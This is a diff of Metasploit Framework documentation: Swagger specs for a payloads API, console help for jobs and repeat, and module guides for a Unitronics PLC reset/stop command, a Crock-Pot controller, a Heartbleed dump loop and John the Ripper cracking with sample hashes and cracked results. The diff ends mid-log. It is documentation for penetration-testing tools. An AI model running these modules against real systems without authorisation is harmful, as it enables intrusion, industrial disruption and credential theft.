+    property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
+  end
+
+  swagger_path '/api/v1/payloads' do
+    # Swagger documentation for /api/v1/payloads GET
+    operation :get do
+      key :description, 'Return payloads that are stored in the database.'
+      key :tags, [ 'payload' ]
+
+      parameter :workspace
+
+      response 200 do
+        key :description, 'Returns payload data.'
+        schema do
+          property :data do
+            key :type, :array
+            items do
+              key :'$ref', :Payload
+            end
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads POST
+    operation :post do
+      key :description, 'Create a payload entry.'
+      key :tags, [ 'payload' ]
+
+      parameter do
+        key :in, :body
+        key :name, :body
+        key :description, 'The attributes to assign to the payload.'
+        key :required, true
+        schema do
+          property :name, type: :string, description: NAME_DESC
+          property :uuid, type: :string, description: UUID_DESC, example: UUID_EXAMPLE
+          property :timestamp, type: :string, description: TIMESTAMP_DESC, example: TIMESTAMP_EXAMPLE
+          property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
+          property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
+          property :urls, type: :string, description: URLS_DESC, example: URLS_EXAMPLE
+          property :description, type: :string, description: DESCRIPTION_DESC
+          property :raw_payload, type: :string, description: RAW_PAYLOAD_DESC
+          property :raw_payload_hash, type: :string, description: RAW_PAYLOAD_HASH_DESC
+          property :build_opts, type: :string, description: BUILD_OPTS_DESC
+          property :workspace_id, type: :string, description: WORKSPACE_ID_DESC, example: WORKSPACE_ID_EXAMPLE
+        end
+      end
+
+      response 200 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_200
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads/ DELETE
+    operation :delete do
+      key :description, 'Delete the specified payloads.'
+      key :tags, [ 'payload' ]
+
+      parameter :delete_opts
+
+      response 200 do
+        key :description, 'Returns an array containing the successfully deleted payloads.'
+        schema do
+          property :data do
+            key :type, :array
+            items do
+              key :'$ref', :Payload
+            end
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+  end
+
+  swagger_path '/api/v1/payloads/{id}' do
+    # Swagger documentation for api/v1/payloads/:id GET
+    operation :get do
+      key :description, 'Return specific payload that is stored in the database.'
+      key :tags, [ 'payload' ]
+
+      parameter do
+        key :name, :id
+        key :in, :path
+        key :description, 'ID of payload to retrieve.'
+        key :required, true
+        key :type, :integer
+        key :format, :int32
+      end
+
+      response 200 do
+        key :description, 'Returns payload data.'
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads/:id PUT
+    operation :put do
+      key :description, 'Update the attributes an existing payload.'
+      key :tags, [ 'payload' ]
+
+      parameter :update_id
+
+      parameter do
+        key :in, :body
+        key :name, :body
+        key :description, 'The updated attributes to overwrite to the payload.'
+        key :required, true
+        schema do
+          key :'$ref', :Payload
+        end
+      end
+
+      response 200 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_200
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+  end
+end
@@ -72,6 +72,7 @@ module RootApiDoc
    tag name: 'msf', description: 'Utility operations around Metasploit Framework.'
    tag name: 'nmap', description: 'Nmap operations.'
    tag name: 'note', description: 'Note operations.'
+    tag name: 'payload', description: 'Payload operations.'
    tag name: 'service', description: 'Service operations.'
    tag name: 'session', description: 'Session operations.'
    tag name: 'session_event', description: 'Session Event operations.'
@@ -0,0 +1,53 @@
+msfconsole
+==========
+
+`msfconsole` is the primary interface to Metasploit Framework. There is quite a
+lot that needs go here, please be patient and keep an eye on this space!
+
+Building ranges and lists
+-------------------------
+
+Many commands and options that take a list of things can use ranges to avoid
+having to manually list each desired thing. All ranges are inclusive.
+
+### Ranges of IDs
+
+Commands that take a list of IDs can use ranges to help. Individual IDs must be
+separated by a `,` (no space allowed) and ranges can be expressed with either
+`-` or `..`.
+
+### Ranges of IPs
+
+There are several ways to specify ranges of IP addresses that can be mixed
+together. The first way is a list of IPs separated by just a ` ` (ASCII space),
+with an optional `,`. The next way is two complete IP addresses in the form of
+`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
+specifications may also be used, however the whole address must be given to
+Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
+Additionally, a netmask can be used in conjunction with a domain name to
+dynamically resolve which block to target. All these methods work for both IPv4
+and IPv6 addresses. IPv4 addresses can also be specified with special octet
+ranges from the [NMAP target
+specification](https://nmap.org/book/man-target-specification.html)
+
+### Examples
+
+Terminate the first sessions:
+
+    sessions -k 1
+
+Stop some extra running jobs:
+
+    jobs -k 2-6,7,8,11..15
+
+Check a set of IP addresses:
+
+    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255
+
+Target a set of IPv6 hosts:
+
+    set RHOSTS fe80::3990:0000/110, ::1-::f0f0
+
+Target a block from a resolved domain name:
+
+    set RHOSTS www.example.test/24
@@ -0,0 +1,124 @@
+Jobs
+====
+
+The `jobs` command is used to interact with modules running in the
+background. Using jobs allows you to run multiple modules at once, like
+multiple `exploit/multi/hander` runs with different options to listen
+for different payloads to call back. Framework automatically starts
+modules that wait for something to happen ("passive modules") as jobs,
+and `run -j` will start any module as a job. When a module is started
+as a job, you will see a message like `[*] Exploit running as
+background job X.`. You will then be able to continue interacting with
+Metasploit as normal, and output from the module will continue to be
+printed to the console, like a background job in other shells.
+
+Usage
+-----
+
+### Flags
+
+#### -h
+
+Display the help banner.
+
+#### -i JOB_ID
+
+Show details of the specified `JOB_ID`, including the name and the time
+the job was started.
+
+#### -K
+
+Stop all currently running jobs.
+
+#### -k JOB_IDS
+
+Stop the specified list of jobs. See [msfconsole > Building ranges and
+lists](../msfconsole.md#building-ranges-and-lists) for more details on
+how to build ranges.
+
+#### -l
+
+List all the currently running jobs. This is the default action. Module
+name, payload, and some payload configuration is shown when present.
+
+#### -P
+
+Save each of the currently running jobs to be restarted when
+`msfconsole` is started. Only valid for jobs running payload handlers.
+See [Persistence](#persistence) below.
+
+#### -p JOB_IDS
+
+Save the specified list of jobs to restarted when `msfconsole` is
+started. Only valid for jobs running payload handlers. See
+[Persistence](#persistence) below and [msfconsole > Building ranges and
+lists](../msfconsole.md#building-ranges-and-listss) for how to specify
+a list of `JOB_IDS`.
+
+#### -S FILTER
+
+Apply a search filter for the output. Currently ignored.
+
+#### -v
+
+Show verbose information with `-i` and `-l`. When combined with `-i`,
+display the advanced options given to the module run. When combined
+with `-l` or no other flags, displays an expanded table of jobs, adding
+the URI for HTTP payload handlers, start time, handler options (if
+present), and whether the job has been persisted with `-p` or `-P`.
+
+Persistence
+-----------
+
+The `-P` and `-p JOB_IDS` flags save payload handler jobs to be started
+every time `msfconsole` is started. This works by saving the
+information needed to start an equivalent `exploit/multi/handler` run
+as a JSON blob in the job persistence file, `~/.msf4/persist` by
+default.
+
+Examples
+--------
+
+Starting a module as a job:
+
+    msf5 exploit(multi/handler) > run -j
+    [*] Exploit running as background job 1.
+
+A verbose listing of all the jobs:
+
+    msf5 exploit(multi/handler) > jobs -v
+    
+    Jobs
+    ====
+    
+      Id  Name                    Payload                          Payload opts          URIPATH  Start Time                 Handler opts  Persist
+      --  ----                    -------                          ------------          -------  ----------                 ------------  -------
+      1   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://127.0.0.1:4444           2019-02-20 19:02:58 -0600                true
+
+Set some jobs to be started on `msfconsole` start:
+
+    msf5 exploit(multi/handler) > jobs -p 1-2
+    Added persistence to job 1.
+    Added persistence to job 2.
+
+Getting information about a specific job:
+
+    msf5 exploit(multi/handler) > jobs -i 1
+    
+    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
+    msf5 exploit(multi/handler) > jobs -i 1 -v
+    
+    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
+    
+    Module advanced options:
+    
+       Name                    Current Setting  Required  Description
+       ----                    ---------------  --------  -----------
+       ContextInformationFile                   no        The information file that contains context information
+       DisablePayloadHandler   false            no        Disable the handler code for the selected payload
+       EnableContextEncoding   false            no        Use transient context when encoding payloads
+       ExitOnSession           true             yes       Return from the exploit after a session has been created
+       ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
+       VERBOSE                 false            no        Enable detailed status messages
+       WORKSPACE                                no        Specify the workspace for this module
+       WfsDelay                0                no        Additional delay when waiting for a session
@@ -0,0 +1,37 @@
+Repeat
+======
+
+The `repeat` command repeats one or more console commands for a fixed number of
+times, a certain length of time, or forever. The repeat command is most useful
+for repeating module runs like memory dumpers or scanners that have a random
+element to them.
+
+Usage
+-----
+
+### Flags
+
+#### -t, --time SECONDS
+
+Start the list of commands until the number of seconds has elapsed.
+
+#### -n, --number TIMES
+
+Start the list of commands a fixed number of times.
+
+#### -h, --help
+
+Display the help banner.
+
+
+
+Examples
+--------
+
+Run the heartbleed module every 10 seconds against a server for an hour:
+
+    msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
+    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP
+    # Set other options...
+    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10
+
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+  Unitronics Vision PLCs
+
+## Verification Steps
+
+  1. Do: `use auxiliary/admin/scada/pcom_command`
+  2. Do: `set RHOST=IP` where IP is the IP address of the target
+  3. Do: `run` to send PCOM command
+
+ ## Scenarios
+
+   ```
+msf5 > use auxiliary/admin/scada/pcom_command
+msf5 auxiliary(admin/scada/pcom_command) > show options
+
+Module options (auxiliary/admin/scada/pcom_command):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   MODE    RESET            yes       PLC command (Accepted: START, STOP, RESET)
+   RHOST                    yes       The target address
+   RPORT   20256            yes       The target port (TCP)
+   UNITID  0                no        Unit ID (0 - 127)
+
+msf5 auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf5 auxiliary(admin/scada/pcom_command) > run
+
+[*] 192.168.1.1:20256 - Sending RESET command
+[*] 192.168.1.1:20256 - Command accepted
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/scada/pcom_command) >
+```
@@ -0,0 +1,60 @@
+## Intro
+
+This module acts as a simple remote control for Belkin Wemo-enabled
+Crock-Pots by implementing a subset of the functionality provided by the
+Wemo App.
+
+No vulnerabilities are exploited by this Metasploit module in any way.
+
+## Setup
+
+You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.
+
+## Actions
+
+```
+Available actions:
+  Name  Description
+  ----  -----------
+  Cook  Cook stuff
+  Stop  Stop cooking
+```
+
+## Options
+
+**TEMP**
+
+Set this to the desired temperature for cooking. Valid values are `Off`,
+`Warm`, `Low`, and `High`.
+
+**TIME**
+
+Set this to the desired cook time in full minutes.
+
+**DefangedMode**
+
+Set this to `false` to disable defanged mode and enable module
+functionality. Set this only if you're SURE you want to proceed.
+
+## Usage
+
+```
+msf5 > use auxiliary/admin/wemo/crockpot
+msf5 auxiliary(admin/wemo/crockpot) > set rhosts 10.22.22.1
+rhosts => 10.22.22.1
+msf5 auxiliary(admin/wemo/crockpot) > set temp High
+temp => High
+msf5 auxiliary(admin/wemo/crockpot) > set time 1
+time => 1
+msf5 auxiliary(admin/wemo/crockpot) > set defangedmode false
+defangedmode => false
+msf5 auxiliary(admin/wemo/crockpot) > set verbose true
+verbose => true
+msf5 auxiliary(admin/wemo/crockpot) > run
+
+[+] Wemo-enabled Crock-Pot detected
+[*] Cooking on High for 1m
+[+] Cook time set to 1m
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/wemo/crockpot) >
+```
@@ -0,0 +1,180 @@
+## Vulnerable Application
+
+  This module applies a john the ripper (or hashcat) style .pot file to hashes in the database.
+  This will allow very fast cracking of all supported hash types which have already been cracked.
+
+## Verification Steps
+
+  1. Have at least one set of hashes in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/apply_pot```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+## Scenarios
+
+In this scenario, we fill a bunch of different hash types into the creds db.  You'll need a
+.pot file with the cracked hashes, the following can be used:
+
+```
+rEK1ecacw.7.c:password
+_J9..K0AyUubDrfOgO4s:password
+$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe:password
+yhMEAyLkfWqeQ:se
+$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/:password
+$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5:password
+$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1:password
+0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8:foo
+0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908:toto
+0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254:FOO
+0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16:Password1!
+445ff82636a7ba59:probe
+*5AD8F88516BD021DD43F171E2C785C69F8E54ADB:tere
+O$SIMON#4f8bc1809cb2af77:A
+O$SYSTEM#9eedfa0ad26c6d52:THALES
+8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A:epsilon
+$oracle12c$e3243b98974159cc24fd2c9a8b30ba62e0e83b6ca2fc7c55177c3a7f82602e3bdd17ceb9b9091cf9dad672b8be961a9eac4d344bdba878edc5dcb5899f689ebd8dd1be3f67bff9813a464382381ab36b:epsilon
+$dynamic_1034$be86a79bf2043622d58d5453c47d4860$HEX$24556578616d706c65:password
+$LM$ac404c4ba2c66533:ASE
+$LM$4a3b108f3fa6cb6d:D
+$LM$e52cac67419a9a22:PASSWOR
+$NT$8846f7eaee8fb117ad06bdd830b7586c:password
+```
+
+```
+resource (hashes_pot.rb)> creds -d
+Credentials
+===========
+
+host  origin  service  public  private  realm  private_type  JtR Format
+----  ------  -------  ------  -------  -----  ------------  ----------
+
+resource (hashes_pot.rb)> creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+resource (hashes_pot.rb)> creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+resource (hashes_pot.rb)> creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
+resource (hashes_pot.rb)> creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
+resource (hashes_pot.rb)> creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
+resource (hashes_pot.rb)> creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+resource (hashes_pot.rb)> creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
+resource (hashes_pot.rb)> creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
+resource (hashes_pot.rb)> creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
+resource (hashes_pot.rb)> creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
+resource (hashes_pot.rb)> creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
+resource (hashes_pot.rb)> creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
+resource (hashes_pot.rb)> creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
+resource (hashes_pot.rb)> creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
+resource (hashes_pot.rb)> creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
+resource (hashes_pot.rb)> creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+resource (hashes_pot.rb)> creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+resource (hashes_pot.rb)> creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
+resource (hashes_pot.rb)> creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
+resource (hashes_pot.rb)> use auxiliary/analyze/apply_pot
+resource (hashes_pot.rb)> run
+[*] Hashes Written out to /tmp/hashes_tmp20190203-16380-1974mdz
+[*] Checking bcrypt hashes against pot file
+[+] blowfish_password:password
+[*] Checking bsdicrypt hashes against pot file
+[+] bsdi_password:password
+[*] Checking crypt hashes against pot file
+Warning: hash encoding string length 46, type id $d
+appears to be unsupported on this system; will not load such hashes.
+[+] des_password:password
+[+] md5_password:password
+[+] sha256_password:password
+[+] sha512_password:password
+[*] Checking descrypt hashes against pot file
+[+] des_password:password
+[*] Checking lm hashes against pot file
+[+] lm_password:password
+[*] Checking nt hashes against pot file
+[+] lm_password:password
+[+] nt_password:password
+[*] Checking md5crypt hashes against pot file
+[+] md5_password:password
+[*] Checking mysql hashes against pot file
+[+] mysql_probe:probe
+[*] Checking mysql-sha1 hashes against pot file
+[+] mysql-sha1_tere:tere
+[*] Checking mssql hashes against pot file
+[+] mssql_foo:FOO
+[*] Checking mssql05 hashes against pot file
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[*] Checking mssql12 hashes against pot file
+[+] mssql12_Password1!:Password1!
+[*] Checking oracle hashes against pot file
+[+] simon:A
+[+] SYSTEM:THALES
+[*] Checking oracle11 hashes against pot file
+[+] DEMO:epsilon
+[+] oracle11_epsilon:epsilon
+[*] Checking oracle12c hashes against pot file
+[+] oracle12c_epsilon:epsilon
+[*] Checking dynamic_1506 hashes against pot file
+[*] Checking dynamic_1034 hashes against pot file
+[+] example:password
+[*] Auxiliary module execution completed
+resource (hashes_pot.rb)> creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       des_password        password                                                                                                                                                                                                                                                                     Password            
+                       des_password        rEK1ecacw.7.c                                                                                                                                                                                                                                                                Nonreplayable hash  des
+                       md5_password        password                                                                                                                                                                                                                                                                     Password            
+                       md5_password        $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                                                                                                                                                                                           Nonreplayable hash  md5
+                       bsdi_password       password                                                                                                                                                                                                                                                                     Password            
+                       bsdi_password       _J9..K0AyUubDrfOgO4s                                                                                                                                                                                                                                                         Nonreplayable hash  bsdi
+                       sha256_password     password                                                                                                                                                                                                                                                                     Password            
+                       sha256_password     $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                                                                                                                                                                                      Nonreplayable hash  sha256,crypt
+                       sha512_password     password                                                                                                                                                                                                                                                                     Password            
+                       sha512_password     $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1                                                                                                                                                                           Nonreplayable hash  sha512,crypt
+                       blowfish_password   password                                                                                                                                                                                                                                                                     Password            
+                       blowfish_password   $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                                                                                                                                                                                                 Nonreplayable hash  bf
+                       lm_password         password                                                                                                                                                                                                                                                                     Password            
+                       lm_password         e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c                                                                                                                                                                                                            NTLM hash           nt,lm
+                       nt_password         password                                                                                                                                                                                                                                                                     Password            
+                       nt_password         aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c                                                                                                                                                                                                            NTLM hash           nt,lm
+                       mssql05_toto        toto                                                                                                                                                                                                                                                                         Password            
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                                                                                                                                       Nonreplayable hash  mssql05
+                       mssql_foo           foo                                                                                                                                                                                                                                                                          Password            
+                       mssql_foo           FOO                                                                                                                                                                                                                                                                          Password            
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                                                                                                                                               Nonreplayable hash  mssql
+                       mssql12_Password1!  Password1!                                                                                                                                                                                                                                                                   Password            
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16                                                                                                                               Nonreplayable hash  mssql12
+                       mysql_probe         probe                                                                                                                                                                                                                                                                        Password            
+                       mysql_probe         445ff82636a7ba59                                                                                                                                                                                                                                                             Nonreplayable hash  mysql
+                       mysql-sha1_tere     tere                                                                                                                                                                                                                                                                         Password            
+                       mysql-sha1_tere     *5AD8F88516BD021DD43F171E2C785C69F8E54ADB                                                                                                                                                                                                                                    Nonreplayable hash  mysql-sha1
+                       simon               A                                                                                                                                                                                                                                                                            Password            
+                       simon               4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       SYSTEM              THALES                                                                                                                                                                                                                                                                       Password            
+                       SYSTEM              9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       DEMO                epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO                S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle11_epsilon    epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle11_epsilon    S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle12c_epsilon   H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+                       example             password                                                                                                                                                                                                                                                                     Password            
+                       example             md5be86a79bf2043622d58d5453c47d4860                                                                                                                                                                                                                                          Postgres md5        raw-md5,postgres
+```
@@ -0,0 +1,136 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
+  based password hashes, such as:
+
+  * `DES` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with a `des` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_aix```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
+```
+
+Crack them:
+
+```
+[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
+[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
+[*] Cracking descrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
